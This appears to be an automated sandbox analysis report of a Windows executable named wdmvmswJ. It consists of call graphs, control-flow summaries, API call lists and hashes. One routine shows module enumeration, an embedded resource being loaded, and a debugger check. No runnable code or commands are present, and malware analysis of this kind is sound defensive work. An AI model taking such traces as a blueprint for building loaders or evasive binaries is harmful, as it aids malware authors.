13643 411cba __calloc_crt 62 API calls 13640->13643 13642->13634 13644 414efb _strlen 13643->13644 13644->13638 13645 40ef42 _strcpy_s 62 API calls 13644->13645 13646 414f14 13645->13646 13647 414f28 SetEnvironmentVariableA 13646->13647 13648 40e61c __invoke_watson 10 API calls 13646->13648 13649 414f49 13647->13649 13650 414f52 13647->13650 13651 414f25 13648->13651 13652 40bfc1 __read_nolock 62 API calls 13649->13652 13653 40b6b5 ___freetlocinfo 62 API calls 13650->13653 13651->13647 13652->13650 13653->13638 13674 417dc2 13654->13674 13656 414d89 13656->13612 13656->13618 13657 414cea 13656->13657 13658 414cfb 13657->13658 13663 414d3b 13657->13663 13659 411cba __calloc_crt 62 API calls 13658->13659 13660 414d12 13659->13660 13661 414d24 13660->13661 13662 40e79a __amsg_exit 62 API calls 13660->13662 13661->13663 13681 417d6d 13661->13681 13662->13661 13663->13618 13668 414ca6 13665->13668 13666 414ccd 13666->13629 13666->13631 13667 40edfb __fassign 106 API calls 13667->13668 13668->13666 13668->13667 13671 411d5d 13669->13671 13672 411da0 13671->13672 13673 411d81 Sleep 13671->13673 13689 40b783 13671->13689 13672->13640 13673->13671 13675 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13674->13675 13676 417dd6 13675->13676 13677 40bfc1 __read_nolock 62 API calls 13676->13677 13680 417df4 __mbschr_l 13676->13680 13678 417de4 13677->13678 13679 40e744 __read_nolock 6 API calls 13678->13679 13679->13680 13680->13656 13682 417d7e _strlen 13681->13682 13688 417d7a 13681->13688 13683 40b84d _malloc 62 API calls 13682->13683 13684 417d91 13683->13684 13685 40ef42 _strcpy_s 62 API calls 13684->13685 13684->13688 13686 417da3 13685->13686 13687 40e61c __invoke_watson 10 API calls 13686->13687 13686->13688 13687->13688 13688->13661 13690 40b792 13689->13690 13691 40b7ba 13689->13691 13690->13691 13693 40b79e 13690->13693 13692 40b7cf 13691->13692 13694 40e56a __msize 63 API calls 13691->13694 13695 40e34f _realloc 71 API calls 13692->13695 13696 40bfc1 __read_nolock 
62 API calls 13693->13696 13694->13692 13699 40b7b3 _memset 13695->13699 13697 40b7a3 13696->13697 13698 40e744 __read_nolock 6 API calls 13697->13698 13698->13699 13699->13671 13701 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13700->13701 13702 40ed21 13701->13702 13703 40ed42 13702->13703 13704 40ed75 13702->13704 13713 40ed2a 13702->13713 13705 40bfc1 __read_nolock 62 API calls 13703->13705 13706 40ed99 13704->13706 13707 40ed7f 13704->13707 13708 40ed47 13705->13708 13710 40eda1 13706->13710 13711 40edb5 13706->13711 13709 40bfc1 __read_nolock 62 API calls 13707->13709 13712 40e744 __read_nolock 6 API calls 13708->13712 13714 40ed84 13709->13714 13718 414b9e 13710->13718 13738 414b5c 13711->13738 13712->13713 13713->13590 13717 40e744 __read_nolock 6 API calls 13714->13717 13717->13713 13719 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13718->13719 13720 414bb2 13719->13720 13721 414bd3 13720->13721 13722 414c06 13720->13722 13734 414bbb 13720->13734 13723 40bfc1 __read_nolock 62 API calls 13721->13723 13724 414c10 13722->13724 13725 414c2a 13722->13725 13726 414bd8 13723->13726 13727 40bfc1 __read_nolock 62 API calls 13724->13727 13728 414c34 13725->13728 13729 414c49 13725->13729 13730 40e744 __read_nolock 6 API calls 13726->13730 13731 414c15 13727->13731 13743 417c1d 13728->13743 13733 414b5c ___crtCompareStringA 95 API calls 13729->13733 13730->13734 13735 40e744 __read_nolock 6 API calls 13731->13735 13736 414c63 13733->13736 13734->13713 13735->13734 13736->13734 13737 40bfc1 __read_nolock 62 API calls 13736->13737 13737->13734 13739 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13738->13739 13740 414b6f 13739->13740 13759 4147ec 13740->13759 13744 417c33 13743->13744 13754 417c58 ___ascii_strnicmp 13743->13754 13745 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13744->13745 13746 417c3e 13745->13746 13747 417c43 13746->13747 13748 417c78 13746->13748 13749 40bfc1 __read_nolock 62 API calls 13747->13749 13750 417c82 13748->13750 13758 
417caa 13748->13758 13751 417c48 13749->13751 13753 40bfc1 __read_nolock 62 API calls 13750->13753 13752 40e744 __read_nolock 6 API calls 13751->13752 13752->13754 13755 417c87 13753->13755 13754->13734 13756 40e744 __read_nolock 6 API calls 13755->13756 13756->13754 13757 4168fc 97 API calls __tolower_l 13757->13758 13758->13754 13758->13757 13760 414818 CompareStringW 13759->13760 13762 41482f strncnt 13759->13762 13761 41483b GetLastError 13760->13761 13760->13762 13761->13762 13764 414a95 13762->13764 13768 4148a4 13762->13768 13778 414881 13762->13778 13763 40ce09 __cftog_l 5 API calls 13765 414b5a 13763->13765 13766 417a20 ___ansicp 86 API calls 13764->13766 13765->13713 13767 414abb 13766->13767 13770 414b1c CompareStringA 13767->13770 13772 417a69 ___convertcp 69 API calls 13767->13772 13767->13778 13769 414962 MultiByteToWideChar 13768->13769 13771 4148e6 GetCPInfo 13768->13771 13768->13778 13769->13778 13780 414982 13769->13780 13773 414b3a 13770->13773 13770->13778 13774 4148f7 13771->13774 13771->13778 13775 414ae0 13772->13775 13776 40b6b5 ___freetlocinfo 62 API calls 13773->13776 13774->13769 13774->13778 13775->13778 13784 417a69 ___convertcp 69 API calls 13775->13784 13777 414b40 13776->13777 13781 40b6b5 ___freetlocinfo 62 API calls 13777->13781 13778->13763 13779 4149d9 MultiByteToWideChar 13782 4149f2 MultiByteToWideChar 13779->13782 13783 414a83 13779->13783 13785 40b84d _malloc 62 API calls 13780->13785 13790 41499f __crtGetStringTypeA_stat 13780->13790 13781->13778 13782->13783 13793 414a09 13782->13793 13787 4147ae __freea 62 API calls 13783->13787 13786 414b01 13784->13786 13785->13790 13788 414b16 13786->13788 13789 414b0a 13786->13789 13787->13778 13788->13770 13791 40b6b5 ___freetlocinfo 62 API calls 13789->13791 13790->13778 13790->13779 13791->13778 13792 414a53 MultiByteToWideChar 13794 414a66 CompareStringW 13792->13794 13795 414a7d 13792->13795 13796 414a1f __crtGetStringTypeA_stat 13793->13796 13797 40b84d _malloc 62 API calls 
13793->13797 13794->13795 13798 4147ae __freea 62 API calls 13795->13798 13796->13783 13796->13792 13797->13796 13798->13783 13799->13594 13806 40d0f5 13800->13806 13803 40cd39 13804 40cd6e RaiseException 13803->13804 13805 40cd62 13803->13805 13804->13555 13805->13804 13807 40d115 _strlen 13806->13807 13808 40af59 13806->13808 13807->13808 13809 40b84d _malloc 62 API calls 13807->13809 13808->13803 13810 40d128 13809->13810 13810->13808 13811 40ef42 _strcpy_s 62 API calls 13810->13811 13811->13808 13813 4017f3 13812->13813 13814 4017e9 EntryPoint 13812->13814 13815 401805 13813->13815 13816 4017fb EntryPoint 13813->13816 13814->13813 13817 401818 13815->13817 13818 40180e EntryPoint 13815->13818 13816->13815 13819 40183e 13817->13819 13820 40b783 __recalloc 72 API calls 13817->13820 13826 401844 13817->13826 13818->13817 13821 40b6b5 ___freetlocinfo 62 API calls 13819->13821 13823 40182d 13820->13823 13821->13826 13823->13826 13827 401834 EntryPoint 13823->13827 13824 40186d MultiByteToWideChar 13824->13561 13824->13562 13825 40184e EntryPoint 13825->13826 13826->13824 13826->13825 13830 40b743 13826->13830 13827->13819 13829 401044 EntryPoint 13828->13829 13831 40e231 __calloc_impl 62 API calls 13830->13831 13832 40b75d 13831->13832 13833 40b779 13832->13833 13834 40bfc1 __read_nolock 62 API calls 13832->13834 13833->13826 13835 40b770 13834->13835 13835->13833 13836 40bfc1 __read_nolock 62 API calls 13835->13836 13836->13833 13838 40b6b5 __sopen_helper 13837->13838 13839 40b73d __sopen_helper 13838->13839 13840 40b714 HeapFree 13838->13840 13839->13581 13840->13839 13841 40b727 13840->13841 13842 40bfc1 __read_nolock 62 API calls 13841->13842 13842->13839 13844 40aff8 13843->13844 13845 40b027 13844->13845 13846 40b01f __VEC_memcpy 13844->13846 13845->13585 13846->13845 13848 4104e0 _raise 6 API calls 13847->13848 13849 40ea5c __init_pointers __initp_misc_winsig 13848->13849 13864 41393d 13849->13864 13852 41046e __encode_pointer 6 API calls 13853 40ea98 
13852->13853 13853->12633 13855 40d56f 13854->13855 13856 40d59d 13855->13856 13857 41389c __ioinit InitializeCriticalSectionAndSpinCount 13855->13857 13856->12623 13856->12643 13857->13855 13859 4105a2 13858->13859 13860 4105ae 13858->13860 13861 4104e9 __decode_pointer 6 API calls 13859->13861 13862 4105d0 13860->13862 13863 4105c2 TlsFree 13860->13863 13861->13860 13862->13862 13863->13862 13865 41046e __encode_pointer 6 API calls 13864->13865 13866 40ea8e 13865->13866 13866->13852 13868 41265c 13867->13868 13871 4126c9 13868->13871 13873 416836 13868->13873 13870 4127c7 13870->12665 13870->12667 13871->13870 13872 416836 72 API calls _parse_cmdline 13871->13872 13872->13871 13876 4167e3 13873->13876 13877 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13876->13877 13878 4167f6 13877->13878 13878->13868 13880 40e8ea __sopen_helper 13879->13880 13881 40d6e0 __lock 62 API calls 13880->13881 13882 40e8f1 13881->13882 13884 4104e9 __decode_pointer 6 API calls 13882->13884 13888 40e9aa __initterm 13882->13888 13886 40e928 13884->13886 13886->13888 13890 4104e9 __decode_pointer 6 API calls 13886->13890 13887 40e9f2 __sopen_helper 13887->12672 13896 40e9f5 13888->13896 13895 40e93d 13890->13895 13891 40e9e9 13892 40e7ee _malloc 3 API calls 13891->13892 13892->13887 13893 4104e9 6 API calls __decode_pointer 13893->13895 13894 4104e0 6 API calls _raise 13894->13895 13895->13888 13895->13893 13895->13894 13897 40e9fb 13896->13897 13899 40e9d6 13896->13899 13901 40d606 LeaveCriticalSection 13897->13901 13899->13887 13900 40d606 LeaveCriticalSection 13899->13900 13900->13891 13901->13899

Control-flow Graph

[Figure: control-flow graph; legend: Executed, Not Executed]
APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• _getenv.LIBCMT ref: 00401ABA
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
• Module32Next.KERNEL32(00000000,?,?,?,00000008,00000000), ref: 00401D02
• Module32Next.KERNEL32(00000000,?,?,?,00000000,?,?,?,00000008,00000000), ref: 00401DB6
• CloseHandle.KERNEL32(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000008,00000000), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
• _memset.LIBCMT ref: 00401EDD
• SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1430744539-2962942730
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 152 40af66-40af6e 153 40af7d-40af88 call 40b84d 152->153 156 40af70-40af7b call 40d2e3 153->156 157 40af8a-40af8b 153->157 156->153 160 40af8c-40af98 156->160 161 40afb3-40afca call 40af49 call 40cd39 160->161 162 40af9a-40afb2 call 40aefc call 40d2bd 160->162 162->161
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                                                                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3622535130-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 171 401870-401883 call 40af66 174 4018b2 171->174 175 401885-4018a2 #2 171->175 176 4018b4-4018b8 174->176 175->176 177 4018a4-4018a6 175->177 178 4018c4-4018c9 176->178 179 4018ba-4018bf call 40ad90 176->179 177->176 180 4018a8-4018ad call 40ad90 177->180 179->178 180->174
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                                                                                                                                                                                                                          • #2.OLEAUT32 ref: 00401898
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _malloc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1579825452-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 183 40d534-40d556 HeapCreate 184 40d558-40d559 183->184 185 40d55a-40d563 183->185
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ae262bbb86af0a4598cdd8b0d7fd7f20448e8bed12feec13612115d6eddc44d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B731C221905688AACF328A285844BF77B64DB61779F1DC157E64C8B3A2D33D9C40C7EE

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
